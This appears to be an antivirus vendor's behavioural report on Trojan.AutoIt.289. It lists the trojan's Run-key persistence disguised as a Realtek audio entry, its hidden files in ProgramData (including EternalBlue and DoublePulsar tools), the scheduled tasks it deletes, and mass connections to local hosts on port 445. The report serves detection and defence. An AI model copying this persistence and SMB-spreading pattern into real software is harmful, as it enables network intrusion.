Trojan.AutoIt.289

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Realtek HD Audio' = '%PROGRAMDATA%\RealtekHD\taskhostw.exe'

Malicious functions

To complicate detection of its presence in the operating system,

forces the system hide from view:

hidden files

Modifies file system

Creates the following files

%TEMP%\autd577.tmp
%PROGRAMDATA%\rundll\pcreposix-0.dll
%PROGRAMDATA%\rundll\pcrecpp-0.dll
%PROGRAMDATA%\rundll\pcre-0.dll
%PROGRAMDATA%\rundll\pcla-0.dll
%PROGRAMDATA%\rundll\msvcp140.dll
%PROGRAMDATA%\rundll\mfcm140u.dll
%PROGRAMDATA%\rundll\mfcm140.dll
%PROGRAMDATA%\rundll\mfc140rus.dll
%PROGRAMDATA%\rundll\mfc140kor.dll
%PROGRAMDATA%\rundll\mfc140jpn.dll
%PROGRAMDATA%\rundll\mfc140ita.dll
%PROGRAMDATA%\rundll\mfc140fra.dll
%PROGRAMDATA%\rundll\posh.dll
%PROGRAMDATA%\rundll\posh-0.dll
%PROGRAMDATA%\rundll\mfc140deu.dll
%PROGRAMDATA%\rundll\mfc140cht.dll
%PROGRAMDATA%\rundll\mfc140chs.dll
%PROGRAMDATA%\rundll\libxml2.dll
%PROGRAMDATA%\rundll\libiconv-2.dll
%PROGRAMDATA%\rundll\libeay32.dll
%PROGRAMDATA%\rundll\libcurl.dll
%PROGRAMDATA%\rundll\iconv.dll
%PROGRAMDATA%\rundll\exma.dll
%PROGRAMDATA%\rundll\exma-1.dll
%PROGRAMDATA%\rundll\etebcore-2.x86.dll
%PROGRAMDATA%\rundll\etebcore-2.x64.dll
%PROGRAMDATA%\rundll\mfc140esn.dll
%PROGRAMDATA%\rundll\api-ms-win-core-localization-l1-2-0.dll
%PROGRAMDATA%\rundll\riar-2.dll
%PROGRAMDATA%\windowstask\microsofthost.exe
%PROGRAMDATA%\windowstask\scandll.dat
%PROGRAMDATA%\rundll\start.vbs
%PROGRAMDATA%\rundll\eternalblue-2.2.0.fb
%PROGRAMDATA%\rundll\zlib1.dll
%PROGRAMDATA%\rundll\zibe.dll
%PROGRAMDATA%\rundll\xdvl-0.dll
%PROGRAMDATA%\rundll\x86.dll
%PROGRAMDATA%\rundll\x64.dll
%PROGRAMDATA%\rundll\vcruntime140.dll
%PROGRAMDATA%\rundll\vcomp140.dll
%PROGRAMDATA%\rundll\vccorlib140.dll
%PROGRAMDATA%\rundll\vcamp140.dll
%PROGRAMDATA%\rundll\ucrtbase.dll
%PROGRAMDATA%\rundll\ucl.dll
%PROGRAMDATA%\rundll\tucl.dll
%PROGRAMDATA%\rundll\tucl-1.dll
%PROGRAMDATA%\rundll\trfo.dll
%PROGRAMDATA%\rundll\trfo-2.dll
%PROGRAMDATA%\rundll\trfo-0.dll
%PROGRAMDATA%\rundll\trch.dll
%PROGRAMDATA%\rundll\trch-1.dll
%PROGRAMDATA%\rundll\trch-0.dll
%PROGRAMDATA%\rundll\tibe.dll
%PROGRAMDATA%\rundll\tibe-2.dll
%PROGRAMDATA%\rundll\tibe-1.dll
%PROGRAMDATA%\rundll\ssleay32.dll
%PROGRAMDATA%\rundll\eteb-2.dll
%PROGRAMDATA%\rundll\mfc140enu.dll
%PROGRAMDATA%\rundll\etchcore-0.x86.dll
%PROGRAMDATA%\rundll\etchcore-0.x64.dll
%PROGRAMDATA%\rundll\etch-0.dll
%PROGRAMDATA%\rundll\scan.txt
%PROGRAMDATA%\rundll\adfw-2.dll
%PROGRAMDATA%\rundll\2x86.dll
%PROGRAMDATA%\rundll\2x64.dll
%PROGRAMDATA%\rundll\system.exe
%PROGRAMDATA%\rundll\start.exe
%PROGRAMDATA%\rundll\rundll.exe
%PROGRAMDATA%\rundll\eternalblue-2.2.0.exe
%PROGRAMDATA%\rundll\doublepulsar-1.3.1.exe
%PROGRAMDATA%\rundll\eternalblue-2.2.0.xml
%PROGRAMDATA%\rundll\eternalblue-2.2.0.skeleton.xml
%PROGRAMDATA%\rundll\doublepulsar-1.3.1.xml
%PROGRAMDATA%\rundll\doublepulsar-1.3.1.skeleton.xml
%PROGRAMDATA%\windowstask\scaner.dat
%PROGRAMDATA%\rundll\api-ms-win-core-file-l1-2-0.dll
%LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
%APPDATA%\microsoft\windows\cookies\low\index.dat
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\7x7ua0tm\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\39hwi0wl\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\o9onj1qo\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\wsing5k9\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
%LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
%PROGRAMDATA%\windowstask\winlogon.exe
%PROGRAMDATA%\rundll\result.txt
%PROGRAMDATA%\rundll\riar.dll
%PROGRAMDATA%\rundll\api-ms-win-core-file-l2-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-core-synch-l1-2-0.dll
%PROGRAMDATA%\rundll\adfw.dll
%PROGRAMDATA%\rundll\esco-0.dll
%PROGRAMDATA%\rundll\dmgd-4.dll
%PROGRAMDATA%\rundll\dmgd-1.dll
%PROGRAMDATA%\rundll\crli-0.dll
%PROGRAMDATA%\rundll\concrt140.dll
%PROGRAMDATA%\rundll\coli-0.dll
%PROGRAMDATA%\rundll\cnli-1.dll
%PROGRAMDATA%\rundll\cnli-0.dll
%PROGRAMDATA%\rundll\api-ms-win-eventing-provider-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-utility-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-time-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-string-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-stdio-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-runtime-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-process-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-private-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-multibyte-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-math-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-locale-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-heap-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-filesystem-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-environment-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-convert-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-conio-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-core-xstate-l2-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-core-timezone-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-core-processthreads-l1-1-1.dll
%PROGRAMDATA%\windowstask\audiodg.exe

Sets the 'hidden' attribute to the following files

%PROGRAMDATA%\windowstask\winlogon.exe
%PROGRAMDATA%\rundll\riar.dll
%PROGRAMDATA%\rundll\riar-2.dll
%PROGRAMDATA%\rundll\posh.dll
%PROGRAMDATA%\rundll\posh-0.dll
%PROGRAMDATA%\rundll\pcreposix-0.dll
%PROGRAMDATA%\rundll\pcrecpp-0.dll
%PROGRAMDATA%\rundll\pcre-0.dll
%PROGRAMDATA%\rundll\pcla-0.dll
%PROGRAMDATA%\rundll\msvcp140.dll
%PROGRAMDATA%\rundll\mfcm140u.dll
%PROGRAMDATA%\rundll\mfcm140.dll
%PROGRAMDATA%\rundll\mfc140rus.dll
%PROGRAMDATA%\rundll\rundll.exe
%PROGRAMDATA%\rundll\mfc140kor.dll
%PROGRAMDATA%\rundll\mfc140ita.dll
%PROGRAMDATA%\rundll\mfc140fra.dll
%PROGRAMDATA%\rundll\mfc140esn.dll
%PROGRAMDATA%\rundll\mfc140enu.dll
%PROGRAMDATA%\rundll\mfc140deu.dll
%PROGRAMDATA%\rundll\mfc140cht.dll
%PROGRAMDATA%\rundll\mfc140chs.dll
%PROGRAMDATA%\rundll\libxml2.dll
%PROGRAMDATA%\rundll\libiconv-2.dll
%PROGRAMDATA%\rundll\libeay32.dll
%PROGRAMDATA%\rundll\libcurl.dll
%PROGRAMDATA%\rundll\iconv.dll
%PROGRAMDATA%\rundll\mfc140jpn.dll
%PROGRAMDATA%\rundll\tucl.dll
%PROGRAMDATA%\windowstask\microsofthost.exe
%PROGRAMDATA%\rundll\start.exe
%PROGRAMDATA%\windowstask\scandll.exe
%PROGRAMDATA%\windowstask\scandll.dat
%PROGRAMDATA%\rundll\zlib1.dll
%PROGRAMDATA%\rundll\zibe.dll
%PROGRAMDATA%\rundll\xdvl-0.dll
%PROGRAMDATA%\rundll\x86.dll
%PROGRAMDATA%\rundll\x64.dll
%PROGRAMDATA%\rundll\vcruntime140.dll
%PROGRAMDATA%\rundll\vcomp140.dll
%PROGRAMDATA%\rundll\vccorlib140.dll
%PROGRAMDATA%\rundll\vcamp140.dll
%PROGRAMDATA%\rundll\ucrtbase.dll
%PROGRAMDATA%\rundll\exma.dll
%PROGRAMDATA%\rundll\ucl.dll
%PROGRAMDATA%\rundll\tucl-1.dll
%PROGRAMDATA%\rundll\trfo.dll
%PROGRAMDATA%\rundll\trfo-2.dll
%PROGRAMDATA%\rundll\trfo-0.dll
%PROGRAMDATA%\rundll\trch.dll
%PROGRAMDATA%\rundll\trch-1.dll
%PROGRAMDATA%\rundll\trch-0.dll
%PROGRAMDATA%\rundll\tibe.dll
%PROGRAMDATA%\rundll\tibe-2.dll
%PROGRAMDATA%\rundll\tibe-1.dll
%PROGRAMDATA%\rundll\system.exe
%PROGRAMDATA%\rundll\start.vbs
%PROGRAMDATA%\rundll\scan.txt
%PROGRAMDATA%\rundll\ssleay32.dll
%PROGRAMDATA%\rundll\exma-1.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-multibyte-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-heap-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-filesystem-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-environment-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-convert-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-conio-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-core-xstate-l2-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-core-timezone-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-core-synch-l1-2-0.dll
%PROGRAMDATA%\rundll\api-ms-win-core-processthreads-l1-1-1.dll
%PROGRAMDATA%\rundll\api-ms-win-core-localization-l1-2-0.dll
%PROGRAMDATA%\rundll\api-ms-win-core-file-l2-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-core-file-l1-2-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-locale-l1-1-0.dll
%PROGRAMDATA%\rundll\adfw.dll
%PROGRAMDATA%\rundll\2x86.dll
%PROGRAMDATA%\rundll\2x64.dll
%PROGRAMDATA%\windowstask\scaner.exe
%PROGRAMDATA%\windowstask\scaner.dat
%LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
%LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\7x7ua0tm\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\39hwi0wl\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\o9onj1qo\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\wsing5k9\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
%PROGRAMDATA%\rundll\adfw-2.dll
%PROGRAMDATA%\rundll\dmgd-1.dll
%PROGRAMDATA%\rundll\eternalblue-2.2.0.skeleton.xml
%PROGRAMDATA%\rundll\api-ms-win-crt-private-l1-1-0.dll
%PROGRAMDATA%\rundll\eternalblue-2.2.0.fb
%PROGRAMDATA%\rundll\eternalblue-2.2.0.exe
%PROGRAMDATA%\rundll\etebcore-2.x86.dll
%PROGRAMDATA%\rundll\etebcore-2.x64.dll
%PROGRAMDATA%\rundll\eteb-2.dll
%PROGRAMDATA%\rundll\etchcore-0.x86.dll
%PROGRAMDATA%\rundll\etchcore-0.x64.dll
%PROGRAMDATA%\rundll\etch-0.dll
%PROGRAMDATA%\rundll\esco-0.dll
%PROGRAMDATA%\rundll\doublepulsar-1.3.1.xml
%PROGRAMDATA%\rundll\doublepulsar-1.3.1.skeleton.xml
%PROGRAMDATA%\rundll\doublepulsar-1.3.1.exe
%PROGRAMDATA%\rundll\eternalblue-2.2.0.xml
%PROGRAMDATA%\rundll\dmgd-4.dll
%PROGRAMDATA%\rundll\crli-0.dll
%PROGRAMDATA%\rundll\concrt140.dll
%PROGRAMDATA%\rundll\coli-0.dll
%PROGRAMDATA%\rundll\cnli-1.dll
%PROGRAMDATA%\rundll\cnli-0.dll
%PROGRAMDATA%\rundll\api-ms-win-eventing-provider-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-utility-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-time-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-string-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-stdio-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-runtime-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-process-l1-1-0.dll
%PROGRAMDATA%\rundll\api-ms-win-crt-math-l1-1-0.dll
%PROGRAMDATA%\windowstask\audiodg.exe

Deletes the following files

%TEMP%\autd577.tmp
<SYSTEM32>\tasks\officesoftwareprotectionplatform\svcrestarttask
<SYSTEM32>\tasks\adobe acrobat update task
%WINDIR%\tasks\adobe flash player updater.job
<SYSTEM32>\tasks\adobe flash player updater
%PROGRAMDATA%\windowstask\scaner.exe
%PROGRAMDATA%\windowstask\scandll.exe
%PROGRAMDATA%\rundll\result.txt

Moves the following files

from %PROGRAMDATA%\windowstask\scaner.dat to %PROGRAMDATA%\windowstask\scaner.exe
from %PROGRAMDATA%\windowstask\scandll.dat to %PROGRAMDATA%\windowstask\scandll.exe

Substitutes the following files

%PROGRAMDATA%\ntuser.pol
%HOMEPATH%\ntuser.pol
%PROGRAMDATA%\rundll\result.txt

Network activity

Connects to

'<LOCALNET>.1.47':445
'<LOCALNET>.2.192':445
'<LOCALNET>.2.193':445
'<LOCALNET>.2.194':445
'<LOCALNET>.2.195':445
'<LOCALNET>.2.189':445
'<LOCALNET>.2.196':445
'<LOCALNET>.2.191':445
'<LOCALNET>.2.198':445
'<LOCALNET>.2.200':445
'<LOCALNET>.2.201':445
'<LOCALNET>.2.202':445
'<LOCALNET>.2.203':445
'<LOCALNET>.2.197':445
'<LOCALNET>.2.187':445
'<LOCALNET>.2.199':445
'<LOCALNET>.2.190':445
'<LOCALNET>.2.188':445
'<LOCALNET>.2.186':445
'<LOCALNET>.2.174':445
'<LOCALNET>.2.175':445
'<LOCALNET>.2.176':445
'<LOCALNET>.2.177':445
'<LOCALNET>.2.178':445
'<LOCALNET>.2.179':445
'<LOCALNET>.2.180':445
'<LOCALNET>.2.181':445
'<LOCALNET>.2.182':445
'<LOCALNET>.2.183':445
'<LOCALNET>.2.184':445
'<LOCALNET>.2.185':445
'<LOCALNET>.2.204':445
'<LOCALNET>.2.171':445
'<LOCALNET>.2.205':445
'<LOCALNET>.2.149':445
'<LOCALNET>.2.206':445
'<LOCALNET>.2.227':445
'<LOCALNET>.2.209':445
'<LOCALNET>.2.229':445
'<LOCALNET>.2.230':445
'<LOCALNET>.2.231':445
'<LOCALNET>.2.232':445
'<LOCALNET>.2.233':445
'<LOCALNET>.2.234':445
'<LOCALNET>.2.235':445
'<LOCALNET>.2.236':445
'<LOCALNET>.2.237':445
'<LOCALNET>.2.238':445
'<LOCALNET>.2.239':445
'<LOCALNET>.2.240':445
'<LOCALNET>.2.241':445
'<LOCALNET>.2.226':445
'<LOCALNET>.2.225':445
'<LOCALNET>.2.228':445
'<LOCALNET>.2.173':445
'<LOCALNET>.2.170':445
'<LOCALNET>.2.207':445
'<LOCALNET>.2.210':445
'<LOCALNET>.2.211':445
'<LOCALNET>.2.212':445
'<LOCALNET>.2.213':445
'<LOCALNET>.2.214':445
'<LOCALNET>.2.215':445
'<LOCALNET>.2.216':445
'<LOCALNET>.2.217':445
'<LOCALNET>.2.218':445
'<LOCALNET>.2.219':445
'<LOCALNET>.2.220':445
'<LOCALNET>.2.221':445
'<LOCALNET>.2.222':445
'<LOCALNET>.2.224':445
'<LOCALNET>.2.208':445
'<LOCALNET>.2.223':445
'<LOCALNET>.2.172':445
'<LOCALNET>.2.169':445
'<LOCALNET>.2.168':445
'<LOCALNET>.2.117':445
'<LOCALNET>.2.118':445
'<LOCALNET>.2.119':445
'<LOCALNET>.2.120':445
'<LOCALNET>.2.121':445
'<LOCALNET>.2.122':445
'<LOCALNET>.2.123':445
'<LOCALNET>.2.124':445
'<LOCALNET>.2.125':445
'<LOCALNET>.2.126':445
'<LOCALNET>.2.127':445
'<LOCALNET>.2.128':445
'<LOCALNET>.2.113':445
'<LOCALNET>.2.111':445
'<LOCALNET>.2.242':445
'<LOCALNET>.2.116':445
'<LOCALNET>.2.130':445
'<LOCALNET>.2.115':445
'<LOCALNET>.2.112':445
'<LOCALNET>.2.97':445
'<LOCALNET>.2.98':445
'<LOCALNET>.2.99':445
'<LOCALNET>.2.100':445
'<LOCALNET>.2.101':445
'<LOCALNET>.2.95':445
'<LOCALNET>.2.102':445
'<LOCALNET>.2.104':445
'<LOCALNET>.2.105':445
'<LOCALNET>.2.106':445
'<LOCALNET>.2.107':445
'<LOCALNET>.2.108':445
'<LOCALNET>.2.109':445
'<LOCALNET>.2.103':445
'<LOCALNET>.2.110':445
'<LOCALNET>.2.129':445
'<LOCALNET>.2.94':445
'<LOCALNET>.2.132':445
'<LOCALNET>.2.134':445
'<LOCALNET>.2.154':445
'<LOCALNET>.2.155':445
'<LOCALNET>.2.156':445
'<LOCALNET>.2.157':445
'<LOCALNET>.2.158':445
'<LOCALNET>.2.159':445
'<LOCALNET>.2.160':445
'<LOCALNET>.2.161':445
'<LOCALNET>.2.162':445
'<LOCALNET>.2.163':445
'<LOCALNET>.2.164':445
'<LOCALNET>.2.165':445
'<LOCALNET>.2.166':445
'<LOCALNET>.2.131':445
'<LOCALNET>.2.167':445
'<LOCALNET>.2.153':445
'<LOCALNET>.2.133':445
'<LOCALNET>.2.152':445
'<LOCALNET>.2.150':445
'<LOCALNET>.2.135':445
'<LOCALNET>.2.136':445
'<LOCALNET>.2.137':445
'<LOCALNET>.2.138':445
'<LOCALNET>.2.139':445
'<LOCALNET>.2.140':445
'<LOCALNET>.2.141':445
'<LOCALNET>.2.142':445
'<LOCALNET>.2.143':445
'<LOCALNET>.2.144':445
'<LOCALNET>.2.145':445
'<LOCALNET>.2.146':445
'<LOCALNET>.2.147':445
'<LOCALNET>.2.148':445
'<LOCALNET>.2.114':445
'<LOCALNET>.2.151':445
'<LOCALNET>.2.96':445
'<LOCALNET>.2.243':445
'<LOCALNET>.2.247':445
'<LOCALNET>.3.86':445
'<LOCALNET>.3.87':445
'<LOCALNET>.3.88':445
'<LOCALNET>.3.89':445
'<LOCALNET>.3.90':445
'<LOCALNET>.3.84':445
'<LOCALNET>.3.85':445
'<LOCALNET>.3.91':445
'<LOCALNET>.3.94':445
'<LOCALNET>.3.95':445
'<LOCALNET>.3.96':445
'<LOCALNET>.3.97':445
'<LOCALNET>.3.98':445
'<LOCALNET>.3.92':445
'<LOCALNET>.3.93':445
'<LOCALNET>.3.83':445
'<LOCALNET>.3.81':445
'<LOCALNET>.3.100':445
'<LOCALNET>.3.68':445
'<LOCALNET>.3.69':445
'<LOCALNET>.3.70':445
'<LOCALNET>.3.71':445
'<LOCALNET>.3.72':445
'<LOCALNET>.3.73':445
'<LOCALNET>.3.74':445
'<LOCALNET>.3.75':445
'<LOCALNET>.3.76':445
'<LOCALNET>.3.77':445
'<LOCALNET>.3.78':445
'<LOCALNET>.3.79':445
'<LOCALNET>.3.80':445
'<LOCALNET>.3.99':445
'<LOCALNET>.3.66':445
'<LOCALNET>.3.82':445
'<LOCALNET>.3.63':445
'<LOCALNET>.3.101':445
'<LOCALNET>.3.122':445
'<LOCALNET>.3.123':445
'<LOCALNET>.3.124':445
'<LOCALNET>.3.125':445
'<LOCALNET>.3.126':445
'<LOCALNET>.3.127':445
'<LOCALNET>.3.128':445
'<LOCALNET>.3.129':445
'<LOCALNET>.3.130':445
'<LOCALNET>.3.131':445
'<LOCALNET>.3.132':445
'<LOCALNET>.3.133':445
'<LOCALNET>.3.134':445
'<LOCALNET>.3.135':445
'<LOCALNET>.3.136':445
'<LOCALNET>.3.121':445
'<LOCALNET>.3.65':445
'<LOCALNET>.3.67':445
'<LOCALNET>.3.118':445
'<LOCALNET>.3.103':445
'<LOCALNET>.3.104':445
'<LOCALNET>.3.105':445
'<LOCALNET>.3.106':445
'<LOCALNET>.3.107':445
'<LOCALNET>.3.108':445
'<LOCALNET>.3.109':445
'<LOCALNET>.3.110':445
'<LOCALNET>.3.111':445
'<LOCALNET>.3.112':445
'<LOCALNET>.3.113':445
'<LOCALNET>.3.114':445
'<LOCALNET>.3.115':445
'<LOCALNET>.3.116':445
'<LOCALNET>.3.117':445
'<LOCALNET>.3.119':445
'<LOCALNET>.3.102':445
'<LOCALNET>.3.64':445
'<LOCALNET>.3.62':445
'<LOCALNET>.1.253':445
'<LOCALNET>.3.11':445
'<LOCALNET>.3.12':445
'<LOCALNET>.3.13':445
'<LOCALNET>.3.14':445
'<LOCALNET>.3.15':445
'<LOCALNET>.3.16':445
'<LOCALNET>.3.17':445
'<LOCALNET>.3.18':445
'<LOCALNET>.3.19':445
'<LOCALNET>.3.20':445
'<LOCALNET>.3.21':445
'<LOCALNET>.3.22':445
'<LOCALNET>.3.23':445
'<LOCALNET>.3.8':445
'<LOCALNET>.3.7':445
'<LOCALNET>.3.10':445
'<LOCALNET>.3.9':445
'<LOCALNET>.3.24':445
'<LOCALNET>.2.244':445
'<LOCALNET>.2.248':445
'<LOCALNET>.2.249':445
'<LOCALNET>.2.250':445
'<LOCALNET>.2.251':445
'<LOCALNET>.2.252':445
'<LOCALNET>.2.253':445
'<LOCALNET>.2.254':445
'<LOCALNET>.2.255':445
'<LOCALNET>.3.0':445
'<LOCALNET>.3.1':445
'<LOCALNET>.3.2':445
'<LOCALNET>.3.3':445
'<LOCALNET>.3.4':445
'<LOCALNET>.3.6':445
'<LOCALNET>.2.246':445
'<LOCALNET>.3.5':445
'<LOCALNET>.2.245':445
'<LOCALNET>.3.25':445
'<LOCALNET>.3.29':445
'<LOCALNET>.3.49':445
'<LOCALNET>.3.50':445
'<LOCALNET>.3.51':445
'<LOCALNET>.3.52':445
'<LOCALNET>.3.53':445
'<LOCALNET>.3.54':445
'<LOCALNET>.3.55':445
'<LOCALNET>.3.56':445
'<LOCALNET>.3.57':445
'<LOCALNET>.3.58':445
'<LOCALNET>.3.59':445
'<LOCALNET>.3.60':445
'<LOCALNET>.3.61':445
'<LOCALNET>.3.46':445
'<LOCALNET>.3.45':445
'<LOCALNET>.3.48':445
'<LOCALNET>.3.47':445
'<LOCALNET>.3.26':445
'<LOCALNET>.3.27':445
'<LOCALNET>.3.30':445
'<LOCALNET>.3.31':445
'<LOCALNET>.3.32':445
'<LOCALNET>.3.33':445
'<LOCALNET>.3.34':445
'<LOCALNET>.3.35':445
'<LOCALNET>.3.36':445
'<LOCALNET>.3.37':445
'<LOCALNET>.3.38':445
'<LOCALNET>.3.39':445
'<LOCALNET>.3.40':445
'<LOCALNET>.3.41':445
'<LOCALNET>.3.42':445
'<LOCALNET>.3.44':445
'<LOCALNET>.3.28':445
'<LOCALNET>.3.43':445
'<LOCALNET>.2.93':445
'<LOCALNET>.2.92':445
'<LOCALNET>.2.91':445
'<LOCALNET>.1.145':445
'<LOCALNET>.1.146':445
'<LOCALNET>.1.147':445
'<LOCALNET>.1.148':445
'<LOCALNET>.1.142':445
'<LOCALNET>.1.149':445
'<LOCALNET>.1.144':445
'<LOCALNET>.1.151':445
'<LOCALNET>.1.153':445
'<LOCALNET>.1.154':445
'<LOCALNET>.1.155':445
'<LOCALNET>.1.156':445
'<LOCALNET>.1.150':445
'<LOCALNET>.1.141':445
'<LOCALNET>.1.152':445
'<LOCALNET>.1.140':445
'<LOCALNET>.1.124':445
'<LOCALNET>.1.159':445
'<LOCALNET>.1.127':445
'<LOCALNET>.1.128':445
'<LOCALNET>.1.129':445
'<LOCALNET>.1.130':445
'<LOCALNET>.1.131':445
'<LOCALNET>.1.132':445
'<LOCALNET>.1.133':445
'<LOCALNET>.1.134':445
'<LOCALNET>.1.135':445
'<LOCALNET>.1.136':445
'<LOCALNET>.1.137':445
'<LOCALNET>.1.138':445
'<LOCALNET>.1.157':445
'<LOCALNET>.1.158':445
'<LOCALNET>.1.125':445
'<LOCALNET>.1.139':445
'<LOCALNET>.1.196':445
'<LOCALNET>.1.160':445
'<LOCALNET>.1.181':445
'<LOCALNET>.1.182':445
'<LOCALNET>.1.183':445
'<LOCALNET>.1.184':445
'<LOCALNET>.1.185':445
'<LOCALNET>.1.186':445
'<LOCALNET>.1.187':445
'<LOCALNET>.1.188':445
'<LOCALNET>.1.189':445
'<LOCALNET>.1.190':445
'<LOCALNET>.1.191':445
'<LOCALNET>.1.192':445
'<LOCALNET>.1.193':445
'<LOCALNET>.1.194':445
'<LOCALNET>.1.179':445
'<LOCALNET>.1.123':445
'<LOCALNET>.1.178':445
'<LOCALNET>.1.126':445
'<LOCALNET>.1.161':445
'<LOCALNET>.1.162':445
'<LOCALNET>.1.163':445
'<LOCALNET>.1.164':445
'<LOCALNET>.1.165':445
'<LOCALNET>.1.166':445
'<LOCALNET>.1.167':445
'<LOCALNET>.1.168':445
'<LOCALNET>.1.169':445
'<LOCALNET>.1.170':445
'<LOCALNET>.1.171':445
'<LOCALNET>.1.172':445
'<LOCALNET>.1.173':445
'<LOCALNET>.1.174':445
'<LOCALNET>.1.175':445
'<LOCALNET>.1.177':445
'<LOCALNET>.1.122':445
'<LOCALNET>.1.180':445
'<LOCALNET>.1.121':445
'<LOCALNET>.1.120':445
'<LOCALNET>.1.67':445
'<LOCALNET>.1.70':445
'<LOCALNET>.1.71':445
'<LOCALNET>.1.72':445
'<LOCALNET>.1.73':445
'<LOCALNET>.1.74':445
'<LOCALNET>.1.75':445
'<LOCALNET>.1.76':445
'<LOCALNET>.1.77':445
'<LOCALNET>.1.78':445
'<LOCALNET>.1.79':445
'<LOCALNET>.1.80':445
'<LOCALNET>.1.81':445
'<LOCALNET>.1.66':445
'<LOCALNET>.1.82':445
'<LOCALNET>.1.195':445
'<LOCALNET>.1.69':445
'<LOCALNET>.1.83':445
'<LOCALNET>.1.65':445
'<LOCALNET>.1.48':445
'<LOCALNET>.1.50':445
'<LOCALNET>.1.51':445
'<LOCALNET>.1.52':445
'<LOCALNET>.1.53':445
'<LOCALNET>.1.54':445
'<LOCALNET>.1.55':445
'<LOCALNET>.1.49':445
'<LOCALNET>.1.56':445
'<LOCALNET>.1.58':445
'<LOCALNET>.1.59':445
'<LOCALNET>.1.60':445
'<LOCALNET>.1.61':445
'<LOCALNET>.1.62':445
'<LOCALNET>.1.64':445
'<LOCALNET>.1.57':445
'<LOCALNET>.1.63':445
'<LOCALNET>.1.176':445
'<LOCALNET>.1.85':445
'<LOCALNET>.1.87':445
'<LOCALNET>.1.107':445
'<LOCALNET>.1.108':445
'<LOCALNET>.1.109':445
'<LOCALNET>.1.110':445
'<LOCALNET>.1.111':445
'<LOCALNET>.1.112':445
'<LOCALNET>.1.113':445
'<LOCALNET>.1.114':445
'<LOCALNET>.1.115':445
'<LOCALNET>.1.116':445
'<LOCALNET>.1.117':445
'<LOCALNET>.1.118':445
'<LOCALNET>.1.119':445
'<LOCALNET>.1.104':445
'<LOCALNET>.1.103':445
'<LOCALNET>.1.106':445
'<LOCALNET>.1.105':445
'<LOCALNET>.1.84':445
'<LOCALNET>.1.68':445
'<LOCALNET>.1.88':445
'<LOCALNET>.1.89':445
'<LOCALNET>.1.90':445
'<LOCALNET>.1.91':445
'<LOCALNET>.1.92':445
'<LOCALNET>.1.93':445
'<LOCALNET>.1.94':445
'<LOCALNET>.1.95':445
'<LOCALNET>.1.96':445
'<LOCALNET>.1.97':445
'<LOCALNET>.1.98':445
'<LOCALNET>.1.99':445
'<LOCALNET>.1.100':445
'<LOCALNET>.1.102':445
'<LOCALNET>.1.86':445
'<LOCALNET>.1.101':445
'<LOCALNET>.1.143':445
'<LOCALNET>.1.197':445
'<LOCALNET>.2.38':445
'<LOCALNET>.2.40':445
'<LOCALNET>.2.41':445
'<LOCALNET>.2.42':445
'<LOCALNET>.2.43':445
'<LOCALNET>.2.44':445
'<LOCALNET>.2.45':445
